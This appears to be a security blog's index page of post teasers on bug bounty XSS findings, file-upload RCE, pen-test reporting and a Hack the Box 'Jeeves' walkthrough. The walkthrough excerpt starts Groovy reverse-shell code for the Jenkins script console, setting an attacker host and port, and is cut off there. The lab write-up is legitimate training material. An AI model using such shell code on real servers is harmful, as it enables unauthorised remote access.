File Upload to Remote Code Execution
In this post, I will walk you through a real life example of how I was able to compromise a web application and achieve remote
Bugbounty Tips - Zseano Live Mentoring Series - XSS
Over the weekend I participated in @zseanos live stream bug bounty mentoring session in which he created an application for viewers to hack live and
Reflected XSS on driver.grab.com
Thought I would do a quick write up of a small bug that I found late last year (2018). Unfortunately, the bug was considered out
A Beginners guide to Pen Test Reporting
With a few exceptions, the majority of books I have read about pen testing treat reporting as an after thought, with a few pages roughly
Hack the Box - Jeeves Walkthrough
Interface found via Dirbuster
http://10.10.10.63:50000/askjeeves/
Initial Shell
manage jenkins > script console
String host="10.10.15.126";
int port=